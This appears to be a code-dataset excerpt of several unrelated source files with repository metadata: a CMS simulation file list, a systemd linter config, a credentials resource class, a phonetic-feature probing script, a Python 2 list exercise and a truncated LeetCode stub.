'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C7A6E7C1-E5B3-024A-9503-E24EDC61CA2D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C7C42ABE-94A9-AB40-AFE6-920EDA10C25C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C97E4091-F37B-394B-BCE9-F1B66A129BA2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CCD9A00F-9345-3648-A4A2-891A7BD1CAA8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CD84826B-5BE2-004E-9656-B83C2FC789C8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CD9A4248-D1CD-9B42-BB24-997D745D58D9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CEBCAB8C-18E9-6240-B8D8-4ACFF47BA8EB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D04F0002-2265-204D-AE4C-2C5B6BF1234F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D072ECA5-E509-6941-9B5B-9C8247D3A6FD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D0D7AB0E-B354-CB43-812B-BAABF56B757F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D1C27EA2-9188-794D-96D2-2CB4283756C1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D1EF6BA6-BF00-2140-B2C4-AFE68A5EB7CF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D42AB40F-7F08-9C45-AAA8-5B4B38C3DA88.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D5E9ED7F-5BAE-8B4B-AC1C-6BD94CF88ADB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D62C585F-9B28-434A-B04D-EFEE9BC3341E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D640A1C4-1835-5348-998B-41548CB10044.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D74266F0-8D06-3143-B407-40B493E6E566.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D7BD5925-3A45-5242-A5C9-8505A4E7BEFF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D8E7D3EF-0142-2747-AC78-3EEECF8C5215.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DAD40A58-ED8C-6740-8D17-BDD329193FEA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DB94C023-24B7-024B-B88A-DCE09309D428.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DB9A0129-9379-3A43-9A27-8DCD76D9B55A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DC18FBB8-4F4F-6944-9970-EAEC5E33CA16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DDD734D1-E81D-5741-8762-6B6C34EE2493.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/DE55D8BA-53B9-5C47-8251-B0D60CB16B56.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E44AA023-DC39-214A-BA05-D6DD02D72FE5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E4535A81-0543-8941-A55E-B7D2EE833808.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E4FE60CC-2D18-204A-9B04-ABF0520DCCCB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E548A806-229E-AD41-B7A7-C14C2F28A9D7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E5A74A33-85DB-E546-B066-CBFE476A92F8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E82D5FC6-A626-2347-8926-F6DFBCCA5E39.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E898EC17-A87B-9A4D-AC2B-A476399EAE81.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/E9CBB961-60CD-4A49-A6BE-61AA1CBC7F0F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/EA9ABA96-2E00-EC46-A4DF-91AB79AD412B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/EB7F2520-8367-7942-B550-56C4CB8A46D8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ED415DDE-EDF7-D44F-90AD-C95CE1701757.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ED6CAC39-6327-FD49-B61A-4EE8DC953058.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ED77492C-BD36-8F47-9EB4-AEF6AF209FE1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/EECA8C8D-171E-6546-B5F2-CF2E97037D78.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F0C3B26D-18F1-3C47-9301-D444596A7AA4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F139BEA4-57BD-274A-B5C1-69F066973A30.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F18E5ACD-038D-404A-A3D8-79AB45D2330A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F1B34BD2-6838-4540-A522-952E34E7BA97.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F4502E01-60B3-9041-95A9-E0CCB243FD89.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F46D8BFA-3792-2E49-B251-C3F3C2558797.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F539CA69-C3C9-CF4C-A55F-F2FD5E3F5285.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F643D3DE-2C8C-7441-8CB7-A8CCC07AB7CD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F6BC224F-A87C-D540-8E5A-FEB8FD80D5F0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F6BDB661-C232-6E4F-A924-CCE22C205A14.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F7DE319C-15F3-A84E-858D-68B16625FBD6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F91E4FDE-BFE7-3247-BCA5-7E4272FA5D5A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/F9F6BD03-2A46-9F4A-91A8-06694A812DE3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FA0D37AB-3DAC-344A-88C4-A48463262F43.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FA5F013A-C060-6941-8157-4AA764036F16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FABCE777-5D68-3D42-8A9C-66F9558232C6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FADC1F54-331F-074F-BA50-A92E1873AA09.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FD92F439-BB17-1044-ADA4-ADED6597059E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FD9A8C6C-201B-3A49-BBE0-EF277BEB233A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/FE299960-E749-4E44-8C1B-E0A91965F0C8.root',
] )
| [
"noreply@github.com"
] | TreeMaker.noreply@github.com |
a15d8a2d61f046759905ecfabae1a224bd13de50 | 527af27858f7cd937915268ea0dccb9c793bace8 | /systemdlint/systemdlint/conf/knownMandatory.py | 8dec79cd6f0a8f4ee1d98f46115daceb4ffb8000 | [
"BSD-2-Clause"
] | permissive | priv-kweihmann/systemdlint | b382438564ff3cff73655da634d10903027f26c3 | d9909d2e2d970599bb2015e2a667d4debf063384 | refs/heads/master | 2023-04-12T20:26:42.106601 | 2021-12-21T09:51:24 | 2021-12-21T09:51:24 | 182,244,386 | 21 | 2 | BSD-2-Clause | 2020-10-23T18:17:24 | 2019-04-19T10:01:24 | Python | UTF-8 | Python | false | false | 291 | py | KNOWN_MANDATORY = {
"Unit": ["Description"],
"Address": ["Address"],
"BridgeFDB": ["MACAddress"],
"Mount": ["What", "Where"],
"NetDev": ["Name"],
"L2TPSession": ["Name"],
"Peer": ["Name"],
"IPv6AddressLabel": ["Label", "Prefix"],
"NextHop": ["Gateway"]
}
| [
"kweihmann@outlook.com"
] | kweihmann@outlook.com |
b7356056640093a86575c5fbc52bb527a04ea613 | bf3c0b0b2f5eed28043caa155f001bb656ed41a5 | /softboxen/client/resources/box/credentials.py | e70600381da6f261e27f63e660f92cde040fad0f | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | etingof/softboxen | 0787a004f13d7f3d19f4cbf090e55bc229b8470a | 2a7ba85669d563de9824e3962bd48a0849482e3f | refs/heads/master | 2023-03-27T16:56:14.460474 | 2020-04-18T12:30:11 | 2020-04-18T12:30:11 | 239,087,167 | 3 | 1 | BSD-2-Clause | 2020-06-26T06:50:37 | 2020-02-08T07:29:53 | Python | UTF-8 | Python | false | false | 624 | py | #
# This file is part of softboxen software.
#
# Copyright (c) 2020, Ilya Etingof <etingof@gmail.com>
# License: https://github.com/etingof/softboxen/LICENSE.rst
#
import logging
from softboxen.client.resources import base
LOG = logging.getLogger(__name__)
class Credentials(base.Resource):
"""Represent user credentials."""
protocol = base.Field('protocol')
user = base.Field('user')
password = base.Field('password')
class CredentialsCollection(base.ResourceCollection):
"""Represent a collection of users credentials."""
@property
def _resource_type(self):
return Credentials
| [
"etingof@gmail.com"
] | etingof@gmail.com |
a1c19537f19fd89cd2b759d8f619fd37a8036f0f | 8a029afcaee3080728be4648c96865d5847d3247 | /dnnseg/probe.py | 8669d1867ffe72d789110adeb84c7a1aa7918c3a | [] | no_license | coryshain/dnnseg | 623d8c3583a996e496e77123a3296c8731f40613 | 30eed4b031adb3fcef80f98c6f037fd993aa36ca | refs/heads/master | 2021-06-11T00:47:25.975714 | 2021-02-22T14:18:51 | 2021-02-22T14:18:51 | 143,957,434 | 10 | 7 | null | 2020-12-12T01:34:11 | 2018-08-08T03:41:41 | Python | UTF-8 | Python | false | false | 13,408 | py | import sys
import os
import math
import re
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from sklearn.linear_model import LogisticRegression
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score
import pydot
from dnnseg.data import get_random_permutation, is_embedding_dimension
from dnnseg.util import stderr
def get_target_cols(
class_types=None,
lang=None,
):
if class_types is None:
class_types = []
elif isinstance(class_types, str):
class_types = class_types.split()
elif not (isinstance(class_types, list) or isinstance(class_types, tuple)):
class_types = [class_types]
out = []
for class_type in class_types:
if class_type == 'features':
if lang.lower().startswith('eng'):
target_col_names = ['syllabic', 'consonantal', 'sonorant', 'continuant', 'delayed_release', 'approximant',
'nasal', 'voice', 'spread_glottis', 'labial', 'round', 'labiodental', 'coronal',
'anterior', 'distributed', 'strident', 'lateral', 'dorsal', 'high', 'low', 'front',
'back',
'tense', 'stress', 'diphthong']
elif lang.lower().startswith('xit'):
target_col_names = ['consonantal', 'sonorant', 'continuant', 'delayed_release', 'approximant',
'trill', 'nasal', 'voice', 'spread_glottis', 'constricted_glottis', 'labial', 'round',
'labiodental', 'coronal', 'anterior', 'distributed', 'strident', 'lateral', 'dorsal',
'high', 'low', 'front', 'back', 'tense', 'implosive']
else:
target_col_names = [class_type]
else:
target_col_names = [class_type]
out += target_col_names
return out
def probe(
segment_table,
class_types,
lang=None,
classifier_type='mlp',
regularization_scale=0.001,
max_depth=None,
min_impurity_decrease=0.,
n_estimators=100,
n_folds=2,
units=100,
compare_to_baseline=False,
dump_images=False,
verbose=False,
name='probe',
outdir='./probe/'
):
if not os.path.exists(outdir):
os.makedirs(outdir)
target_col_names = get_target_cols(class_types, lang=lang)
X = segment_table
input_col_names = [c for c in X.columns if is_embedding_dimension.match(c)]
target_col_names_cur = []
df_cols = set(X.columns)
for target_col in target_col_names:
if target_col in df_cols:
target_col_names_cur.append(target_col)
else:
sys.stderr.write('Ignoring unrecognized target column "%s"...\n' % target_col)
sys.stderr.flush()
precision = {}
recall = {}
f1 = {}
accuracy = {}
precision_baseline = {}
recall_baseline = {}
f1_baseline = {}
accuracy_baseline = {}
out_dict = {}
if len(target_col_names_cur):
for target_col in target_col_names_cur:
if verbose:
stderr(' Variable: "%s"\n' % target_col)
X_cur = X[(~X[target_col].isnull()) & (~X[target_col].isin(['SIL', 'SPN']))]
fold_size = math.ceil(float(len(X_cur)) / n_folds)
if fold_size:
perm, perm_inv = get_random_permutation(len(X_cur))
y = X_cur[target_col]
if pd.api.types.is_string_dtype(y) or len(y.unique()) > 2:
avg_method = 'macro'
else:
avg_method = 'binary'
if y.sum() > len(y) / 2: # Majority class is positive, flip
y = 1 - y
label_set, label_counts = np.unique(y.values, return_counts=True)
label_probs = label_counts / label_counts.sum()
if verbose:
sys.stderr.write('\r Label proportions:\n')
sys.stderr.flush()
for level, prob in zip(label_set, label_probs):
sys.stderr.write('\r %s: %s\n' % (level, prob))
sys.stderr.flush()
predictions = []
gold = []
for j in range(0, len(X_cur), fold_size):
if verbose:
sys.stderr.write(
'\r Fold %d/%d...' % (int(j / fold_size) + 1, math.ceil(len(X_cur) / fold_size)))
sys.stderr.flush()
if classifier_type.lower() == 'random_forest':
classifier = RandomForestClassifier(
n_estimators=n_estimators,
criterion='entropy',
class_weight='balanced',
max_depth=max_depth,
min_impurity_decrease=min_impurity_decrease
)
elif classifier_type.lower() in ['mlr', 'logreg', 'logistic_regression']:
classifier = LogisticRegression(
class_weight='balanced',
C=regularization_scale,
solver='lbfgs',
multi_class='auto',
max_iter=100
)
elif classifier_type.lower() in ['mlp', 'neural_network']:
if isinstance(units, str):
units = [int(x) for x in units.split()]
if not (isinstance(units, list) or isinstance(units, tuple)):
units = [int(units)]
classifier = MLPClassifier(
units,
alpha=regularization_scale
)
train_select = np.ones(len(X_cur)).astype('bool')
train_select[j:j + fold_size] = False
cv_select = np.logical_not(train_select)
train_select = train_select[perm_inv]
X_train = X_cur[input_col_names][train_select]
y_train = y[train_select]
if len(y_train.unique()) < 2:
break
X_cv = X_cur[input_col_names][cv_select]
y_cv = y[cv_select]
classifier.fit(X_train, y_train)
predictions.append(classifier.predict(X_cv))
gold.append(y_cv)
if len(predictions):
predictions = np.concatenate(predictions, axis=0)
gold = np.concatenate(gold, axis=0)
precision[target_col] = precision_score(gold, predictions, average=avg_method)
recall[target_col] = recall_score(gold, predictions, average=avg_method)
f1[target_col] = f1_score(gold, predictions, average=avg_method)
accuracy[target_col] = accuracy_score(gold, predictions)
if verbose:
stderr('\n Cross-validation F1 for variable "%s": %.4f\n' % (target_col, f1[target_col]))
if compare_to_baseline:
predictions_baseline = np.random.choice(label_set, size=(len(gold),), p=label_probs)
precision_baseline[target_col] = precision_score(gold, predictions_baseline, average=avg_method)
recall_baseline[target_col] = recall_score(gold, predictions_baseline, average=avg_method)
f1_baseline[target_col] = f1_score(gold, predictions_baseline, average=avg_method)
accuracy_baseline[target_col] = accuracy_score(gold, predictions_baseline)
if verbose:
stderr(' Baseline F1 for variable "%s": %.4f\n' % (target_col, f1_baseline[target_col]))
if dump_images and classifier_type.lower() == 'random_forest':
tree_ix = np.random.randint(n_estimators)
graph = export_graphviz(
classifier[tree_ix],
feature_names=input_col_names,
class_names=['-%s' % target_col, '+%s' % target_col],
rounded=True,
proportion=False,
precision=2,
filled=True
)
(graph,) = pydot.graph_from_dot_data(graph)
img_str = '/%s_decision_tree_%s.png'
outfile = outdir + img_str % (name, target_col)
graph.write_png(outfile)
if len(precision):
macro_avg = {
'precision': sum(precision[x] for x in precision) / sum(1 for _ in precision),
'recall': sum(recall[x] for x in recall) / sum(1 for _ in recall),
'f1': sum(f1[x] for x in f1) / sum(1 for _ in f1),
'accuracy': sum(accuracy[x] for x in accuracy) / sum(1 for _ in accuracy)
}
if verbose:
stderr(' Model macro averages:\n')
stderr(' P: %.4f\n' % macro_avg['precision'])
stderr(' R: %.4f\n' % macro_avg['recall'])
stderr(' F1: %.4f\n' % macro_avg['f1'])
stderr(' ACC: %.4f\n' % macro_avg['accuracy'])
if compare_to_baseline:
macro_avg_baseline = {
'precision': sum(precision_baseline[x] for x in precision_baseline) / sum(
1 for _ in precision_baseline),
'recall': sum(recall_baseline[x] for x in recall_baseline) / sum(1 for _ in recall_baseline),
'f1': sum(f1_baseline[x] for x in f1_baseline) / sum(1 for _ in f1_baseline),
'accuracy': sum(accuracy_baseline[x] for x in accuracy_baseline) / sum(
1 for _ in accuracy_baseline)
}
if verbose:
stderr(' Baseline macro averages:\n')
stderr(' P: %.4f\n' % macro_avg_baseline['precision'])
stderr(' R: %.4f\n' % macro_avg_baseline['recall'])
stderr(' F1: %.4f\n' % macro_avg_baseline['f1'])
stderr(' ACC: %.4f\n' % macro_avg_baseline['accuracy'])
path_str = '/%s_classifier_scores.txt'
outfile = outdir + path_str % name
with open(outfile, 'w') as f:
f.write('feature precision recall f1 accuracy\n')
for c in sorted(list(f1.keys())):
f.write('%s %s %s %s %s\n' % (c, precision[c], recall[c], f1[c], accuracy[c]))
f.write('MACRO %s %s %s %s\n' % (macro_avg['precision'], macro_avg['recall'], macro_avg['f1'], macro_avg['accuracy']))
if compare_to_baseline:
path_str = '/%s_baseline_scores.txt'
outfile = outdir + path_str % name
with open(outfile, 'w') as f:
f.write('feature precision recall f1 accuracy\n')
for c in sorted(list(f1.keys())):
f.write('%s %s %s %s %s\n' % (
c, precision_baseline[c], recall_baseline[c], f1_baseline[c], accuracy_baseline[c]))
f.write('MACRO %s %s %s %s\n' % (
macro_avg_baseline['precision'], macro_avg_baseline['recall'], macro_avg_baseline['f1'],
macro_avg_baseline['accuracy']))
for c in sorted(list(f1.keys())):
key_base = '_'.join([name, c])
out_dict[key_base + '_p'] = precision[c]
out_dict[key_base + '_r'] = recall[c]
out_dict[key_base + '_f1'] = f1[c]
if compare_to_baseline:
out_dict[key_base + '_baseline_p'] = precision_baseline[c]
out_dict[key_base + '_baseline_r'] = recall_baseline[c]
out_dict[key_base + '_baseline_f1'] = f1_baseline[c]
out_dict['_'.join([name, 'macro_p'])] = macro_avg['precision']
out_dict['_'.join([name, 'macro_r'])] = macro_avg['recall']
out_dict['_'.join([name, 'macro_f1'])] = macro_avg['f1']
out_dict['_'.join([name, 'macro_acc'])] = macro_avg['accuracy']
if compare_to_baseline:
out_dict['_'.join([name, 'baseline_macro_p'])] = macro_avg_baseline['precision']
out_dict['_'.join([name, 'baseline_macro_r'])] = macro_avg_baseline['recall']
out_dict['_'.join([name, 'baseline_macro_f1'])] = macro_avg_baseline['f1']
out_dict['_'.join([name, 'baseline_macro_acc'])] = macro_avg_baseline['accuracy']
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
return out_dict
| [
"cory.shain@gmail.com"
] | cory.shain@gmail.com |
3be2027bbed138e20adad4a399187c7b472f9d7d | da280a226bbf15d7243410c0d3930bdca00d0088 | /ex39.py | cf0099096111e4cca29e493f9986359bfb0cb6c5 | [] | no_license | c4collins/PyTHWay | 174cae57c73431ce5bfc90a361613c5db5c846d7 | 135b4b908ef2698084ee1b3fb9f1e5550c3c8843 | refs/heads/master | 2021-01-10T18:29:43.998528 | 2012-11-03T22:53:17 | 2012-11-03T22:53:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | ten_things = "Apples Oranges Crows Telephone Light Sugar"
# Exercise script (Python 2): pad a six-word list up to ten items, then
# demonstrate basic list operations (indexing, pop, join, slicing).
# Depends on `ten_things` (a space-separated string) defined above.
print "Wait there's not 10 things in that list, let's fix that."

# Split the space-separated string into a list of six words.
stuff = ten_things.split(' ')
more_stuff = ["Day", "Night", "Song", "Frisbee", "Corn", "Banana", "Girl", "Boy"]

# Move words from the END of more_stuff (pop takes the last element)
# into stuff until stuff holds exactly ten items.
while len(stuff) != 10:
    next_one = more_stuff.pop()
    print "Adding: ", next_one
    stuff.append(next_one)
    print "There's %d items now." % len(stuff)

print "There we go: ", stuff

print "Let's do some more things with stuff."

# Second element, last element, then remove-and-print the last element.
print stuff[1]
print stuff[-1]
print stuff.pop()
# Join the remaining nine words with spaces, then items 3..4 with '#'.
print ' '.join(stuff)
print '#'.join(stuff[3:5])
| [
"connor.collins@gmail.com"
] | connor.collins@gmail.com |
3f723df5d615220111afdd7537c425100cc9e621 | e7b7505c084e2c2608cbda472bc193d4a0153248 | /LeetcodeNew/python/LC_765.py | 022d0738c948efc1eee48d7400433fe08f690773 | [] | no_license | Taoge123/OptimizedLeetcode | 8e5c1cd07904dfce1248bc3e3f960d2f48057a5d | 3e50f6a936b98ad75c47d7c1719e69163c648235 | refs/heads/master | 2023-02-27T21:13:40.450089 | 2023-02-07T04:11:09 | 2023-02-07T04:11:09 | 170,044,224 | 9 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,098 | py | """
https://leetcode.com/problems/couples-holding-hands/discuss/535314/Python-DFS-solution-with-detailed-explanation
